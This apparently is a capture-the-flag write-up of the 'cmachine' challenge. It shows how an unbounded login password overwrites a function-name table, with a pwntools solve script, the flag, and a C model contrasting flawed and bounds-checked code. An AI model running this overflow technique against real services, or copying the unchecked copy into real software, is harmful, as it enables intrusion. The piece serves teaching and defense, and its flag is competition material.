Author: zerodaygym

Midnight Sun CTF 2026 qualifiers - cmachine

Author: @acez

Description

Sometimes reversing is just blackbox pwning.

nc cmashine.play.ctf.se 9190

Flag format: midnight{…}

Flag: midnight{700_b1G_f0r_th3_m4ch1ne}

Writeup

We are given a host and a port to connect to using netcat. After connecting we see this complex machine interface:

image1

After typing help we can see some documented commands. In the previous, easier challenge smashine we had to call the win command by setting any register to 0x1337, so I immediately ignored all commands from the previous challenge and focused on the new ones. One of the few interesting ones was the mem command, which returned the memory:

image2

We can clearly see that the entire memory is empty, except that starting at 0x100 there are 4 different strings, which look similar to functions. Typing the functions command confirms it:

image3

Another interesting command was login. Typing login with some random password string, we are greeted with a message that the password was incorrect, but inspecting the memory afterwards shows that the incorrect password was written there:

image4

I immediately tested whether I could overwrite some of those functions by giving the program a large string, and fortunately I was able to:

image5

image6

After some trial and error with different functions, I decided to try overwriting the echo function with the win function, which was the solution to the previous challenge, and it worked. I calculated the exact offset of the function, and by filling the space before it with null characters followed by the win function, I was able to call win and get the flag:

image7

image8

Solve script:

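from pwn import *

r = remote('cmashine.play.ctf.se', 9190)
# Pad with 0xFF+1 (0x100) null bytes to reach the function strings at 0x100,
# then write 'win' over the echo entry.
r.sendlineafter(b'> ', b'login ' + b'\x00'*(0xFF+1) + b'win')

r.recvuntil(b'> ')

r.interactive()

# Then just type `win` to the console.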
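
The root cause behind the overwrite, as an added C model that is not the challenge's code (the service was only observed as a black box): login stores the password at the start of memory with no bound at 0x100, where the function strings live. The layout follows the writeup; `MEM_SIZE`, `SLOT`, the table entries other than echo, and all function names here are assumptions.

```c
/* Added model, not the challenge binary. From the writeup: password written
 * at 0x000, function names from 0x100. Sizes and names are assumed. */
#include <stdio.h>
#include <string.h>

#define MEM_SIZE  0x200  /* assumed total machine memory */
#define PW_BASE   0x000  /* login writes the password here */
#define FUNC_BASE 0x100  /* function-name table starts here */
#define SLOT      16     /* assumed width of one table entry */

static unsigned char mem[MEM_SIZE];

static void machine_reset(void) {
    static const char *names[4] = {"echo", "help", "mem", "login"}; /* assumed */
    memset(mem, 0, sizeof mem);
    for (int i = 0; i < 4; i++)
        memcpy(mem + FUNC_BASE + i * SLOT, names[i], strlen(names[i]) + 1);
}

/* Flawed: bounded only by total memory, so a long password reaches the table. */
static int login_unchecked(const unsigned char *pw, size_t len) {
    if (len > MEM_SIZE - PW_BASE) len = MEM_SIZE - PW_BASE;
    memcpy(mem + PW_BASE, pw, len);
    return 0;
}

/* Hardened: the password region ends where the function table begins. */
static int login_checked(const unsigned char *pw, size_t len) {
    if (len > FUNC_BASE - PW_BASE) return -1;  /* reject and write nothing */
    memcpy(mem + PW_BASE, pw, len);
    return 0;
}

/* Integrity check: does slot 0 still hold the expected name? */
static int slot0_intact(void) {
    return strcmp((const char *)(mem + FUNC_BASE), "echo") == 0;
}

int main(void) {
    unsigned char in[0x100 + 4] = {0};         /* constructed: 0x100 NULs + name */
    memcpy(in + 0x100, "win", 4);
    machine_reset();
    login_unchecked(in, sizeof in);
    printf("unchecked: slot0=%s intact=%d\n", (char *)(mem + FUNC_BASE), slot0_intact());
    machine_reset();
    int rc = login_checked(in, sizeof in);
    printf("checked:   rc=%d intact=%d\n", rc, slot0_intact());
    return 0;
}
```

Keeping dispatch data such as the function table out of the same writable region as user input removes this class of bug even if a length check is missed.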